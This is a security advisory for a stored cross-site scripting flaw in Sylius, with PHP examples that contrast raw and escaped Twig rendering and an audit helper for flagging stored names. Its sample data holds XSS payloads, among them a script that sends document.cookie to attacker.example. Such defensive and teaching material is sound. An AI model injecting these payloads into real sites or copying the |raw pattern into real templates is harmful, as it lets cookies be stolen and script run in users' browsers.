Cross-site scripting in Sylius - CVE-2026-31823

Published: April 27, 2026


Vulnerability identifier: #VU128218
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Clear
CVE-ID: CVE-2026-31823
CWE-ID: CWE-79
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: Sylius
Affected software: Sylius

Detailed vulnerability description

The vulnerability allows a remote privileged user to inject arbitrary HTML or JavaScript into pages viewed by other users (stored cross-site scripting).

The vulnerability exists due to improper neutralization of input during web page generation (CWE-79): entity names are rendered as raw HTML, without escaping, in both the shop frontend and the admin panel. A remote user who already holds the privileges needed to set an entity name can supply a crafted name containing HTML or JavaScript, which then executes in the browser of anyone who views a page that displays that name.

User interaction is required: a victim must view the storefront or admin page that renders the crafted name (CVSS UI:P). Because the attacker needs a privileged account (PR:H), the practical risk is a compromised or malicious back-office account using the flaw against other administrators or against shoppers; on the advisory's description it is not reachable by unauthenticated users.
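To make the pattern concrete, here is an added example (not Sylius code, and not taken from the advisory) that renders a constructed entity name through Twig, the template engine Sylius uses, first with the `|raw` filter, which is the usual way a template ends up emitting stored text as raw HTML, and then with Twig's default HTML autoescaping. The template names, the array-backed entity and the sample name are assumptions for the illustration; it needs only the twig/twig Composer package.

```php
<?php
// Added illustration of the vulnerable and hardened rendering patterns.
// Not Sylius code; assumes twig/twig (v3) is installed via Composer.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;

// Constructed sample: an entity name as a user with edit rights might store it.
$maliciousName = 'Summer Sale <img src=x onerror="alert(document.cookie)">';

$loader = new ArrayLoader([
    // Vulnerable pattern: |raw switches autoescaping off for this value, so the
    // stored string is emitted verbatim and the injected tag becomes live markup.
    'vulnerable.html.twig' => '<h1>{{ entity.name|raw }}</h1>',

    // Hardened pattern: no |raw, so Twig's HTML autoescaping encodes <, >, " and '
    // and the browser shows the name as text.
    'hardened.html.twig' => '<h1>{{ entity.name }}</h1>',

    // Attribute context: inside a quoted attribute use the html_attr strategy;
    // the element body still gets the default html escaping.
    'attr.html.twig' => "<a title=\"{{ entity.name|e('html_attr') }}\">{{ entity.name }}</a>",
]);

// 'html' is Twig's default autoescape strategy; it is spelled out here for clarity.
$twig = new Environment($loader, ['autoescape' => 'html']);

/** Renders one template with the given entity name and returns the HTML. */
function renderName(Environment $twig, string $template, string $name): string
{
    return $twig->render($template, ['entity' => ['name' => $name]]);
}

foreach (['vulnerable.html.twig', 'hardened.html.twig', 'attr.html.twig'] as $template) {
    echo $template, ":\n  ", renderName($twig, $template, $maliciousName), "\n";
}
```

The first template prints the `<img ...>` tag intact, so the `onerror` handler runs in the browser of whoever views the page; the second and third print the same name with the angle brackets and quotes entity-encoded, which is the behaviour a fix for this class of bug restores. When auditing templates, search for `|raw` (and for `autoescape false` blocks) applied to any value that originates from user-editable fields such as names.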


How to mitigate CVE-2026-31823

Install the security update from the vendor's website. Until it is applied, treat the permission to edit entity names as equivalent to the ability to run script in the browsers of administrators and shoppers, and restrict it to trusted accounts. After updating, review entity names that are already stored: a fix that escapes on output renders previously injected markup harmless but does not remove it, and its presence indicates that a privileged account was abused.
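The review of stored names can be scripted. The following is an added helper, not part of Sylius or of the advisory, that flags names containing HTML markup, including markup smuggled through HTML entities. The rows are a constructed sample; in a real audit the names would be read from the database tables or repositories that hold the affected entities' names, which this example does not assume.

```php
<?php
// Added audit helper for stored entity names. Not Sylius code.
// Assumes nothing beyond PHP's standard string functions.

/**
 * Returns true when a stored name contains HTML markup, either literally
 * or hidden behind HTML entities, that would become active if rendered
 * without escaping.
 */
function nameContainsMarkup(string $name): bool
{
    // strip_tags removes any <tag ...> construct; any difference means a tag was present.
    // A bare "<" followed by whitespace (e.g. "Price < 10 EUR") is left alone.
    if (strip_tags($name) !== $name) {
        return true;
    }

    // Some raw-output paths decode entities before rendering, so also check
    // the decoded form (catches names like "&lt;script&gt;...").
    $decoded = html_entity_decode($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return strip_tags($decoded) !== $decoded;
}

/**
 * Takes an array of id => name and returns only the suspicious entries,
 * keyed by id, so the caller can trace them back to who last edited them.
 */
function auditNames(array $rows): array
{
    $flagged = [];
    foreach ($rows as $id => $name) {
        if (nameContainsMarkup((string) $name)) {
            $flagged[$id] = $name;
        }
    }
    return $flagged;
}

// Constructed sample rows; ids and names are invented for the illustration.
$sampleRows = [
    101 => 'Running Shoes',
    102 => 'T-shirt (M)',
    103 => 'Sale <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    104 => 'Deal &lt;img src=x onerror=alert(1)&gt;',
    105 => 'Price < 10 EUR',
];

foreach (auditNames($sampleRows) as $id => $name) {
    printf("suspicious name id=%d: %s\n", $id, $name);
}
```

Run against the sample, the helper flags rows 103 and 104 and leaves the legitimate names, including the one with a bare `<`, untouched. For each flagged row the follow-up is to check the audit trail of the account that last edited it, since under this advisory only a privileged user can have written such a value.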
